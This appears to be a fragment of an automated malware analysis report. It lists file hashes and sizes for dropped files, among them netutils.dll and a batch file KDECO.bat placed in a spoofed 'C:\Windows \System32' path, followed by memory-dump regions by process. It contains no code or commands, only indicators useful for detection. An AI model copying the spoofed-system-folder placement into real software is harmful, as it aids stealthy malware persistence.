MD5231ce1e1d7d98b44371ffff407d68b59
SHA125510d0f6353dbf0c9f72fc880de7585e34b28ff
SHA25630951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96
SHA512520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612
-
C:\Windows \System32\netutils.dllFilesize
110KB
MD5b375e74a145c45d07190212e9157e5f8
SHA159d3de7748e1090ce95523601224ce5ab6cc4a3a
SHA2566ec341496722bfdde504d430a7ece494701a9369b1fa5376ec488a77ab3c1744
SHA512859737afb6108f131c0ac35560878359505c4f7fdd01ce468c04b15848df71f70987552a831a43ce948a37c9b1d6a434ff7f6fb5946f3730049b924d5b462ef0
-
C:\Windows \System32\netutils.dllFilesize
110KB
MD5b375e74a145c45d07190212e9157e5f8
SHA159d3de7748e1090ce95523601224ce5ab6cc4a3a
SHA2566ec341496722bfdde504d430a7ece494701a9369b1fa5376ec488a77ab3c1744
SHA512859737afb6108f131c0ac35560878359505c4f7fdd01ce468c04b15848df71f70987552a831a43ce948a37c9b1d6a434ff7f6fb5946f3730049b924d5b462ef0
-
C:\windows \system32\KDECO.batFilesize
155B
MD5213c60adf1c9ef88dc3c9b2d579959d2
SHA1e4d2ad7b22b1a8b5b1f7a702b303c7364b0ee021
SHA25637c59c8398279916cfce45f8c5e3431058248f5e3bef4d9f5c0f44a7d564f82e
SHA512fe897d9caa306b0e761b2fd61bb5dc32a53bfaad1ce767c6860af4e3ad59c8f3257228a6e1072dab0f990cb51c59c648084ba419ac6bc5c0a99bdffa569217b7
-
memory/2472-201-0x00000251860E0000-0x0000025186102000-memory.dmpFilesize
136KB
-
memory/2472-210-0x0000025186110000-0x0000025186120000-memory.dmpFilesize
64KB
-
memory/2472-208-0x0000025186110000-0x0000025186120000-memory.dmpFilesize
64KB
-
memory/3068-137-0x0000000005A20000-0x0000000006048000-memory.dmpFilesize
6.2MB
-
memory/3068-154-0x00000000077E0000-0x00000000077FA000-memory.dmpFilesize
104KB
-
memory/3068-157-0x0000000007CA0000-0x0000000007CC2000-memory.dmpFilesize
136KB
-
memory/3068-136-0x0000000005270000-0x00000000052A6000-memory.dmpFilesize
216KB
-
memory/3068-153-0x0000000007E90000-0x000000000850A000-memory.dmpFilesize
6.5MB
-
memory/3068-152-0x00000000053E0000-0x00000000053F0000-memory.dmpFilesize
64KB
-
memory/3068-151-0x0000000006700000-0x000000000671E000-memory.dmpFilesize
120KB
-
memory/3068-141-0x0000000006130000-0x0000000006196000-memory.dmpFilesize
408KB
-
memory/3068-140-0x00000000060C0000-0x0000000006126000-memory.dmpFilesize
408KB
-
memory/3068-139-0x0000000005970000-0x0000000005992000-memory.dmpFilesize
136KB
-
memory/3068-138-0x00000000053E0000-0x00000000053F0000-memory.dmpFilesize
64KB
-
memory/3068-135-0x00000000053E0000-0x00000000053F0000-memory.dmpFilesize
64KB
-
memory/3068-156-0x0000000007D10000-0x0000000007DA6000-memory.dmpFilesize
600KB
-
memory/3068-158-0x0000000008AC0000-0x0000000009064000-memory.dmpFilesize
5.6MB
-
memory/3740-170-0x0000000000400000-0x00000000004DF000-memory.dmpFilesize
892KB
-
memory/3740-280-0x0000000010590000-0x0000000010613000-memory.dmpFilesize
524KB
-
memory/3740-270-0x0000000010590000-0x0000000010613000-memory.dmpFilesize
524KB
-
memory/3740-167-0x0000000002430000-0x000000000245C000-memory.dmpFilesize
176KB
-
memory/3740-169-0x0000000000700000-0x0000000000701000-memory.dmpFilesize
4KB
-
memory/4140-196-0x00000000613C0000-0x00000000613E2000-memory.dmpFilesize
136KB
-
memory/4932-281-0x00000000005E0000-0x00000000005E1000-memory.dmpFilesize
4KB
-
memory/4932-295-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-274-0x0000000000580000-0x0000000000581000-memory.dmpFilesize
4KB
-
memory/4932-282-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-285-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-287-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-288-0x0000000010590000-0x0000000010613000-memory.dmpFilesize
524KB
-
memory/4932-317-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-273-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4932-292-0x0000000000400000-0x000000000041A000-memory.dmpFilesize
104KB
-
memory/4932-293-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-316-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-296-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-299-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-300-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-303-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-304-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-307-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-308-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-311-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-313-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-290-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB
-
memory/4932-289-0x0000000000630000-0x00000000006B0000-memory.dmpFilesize
512KB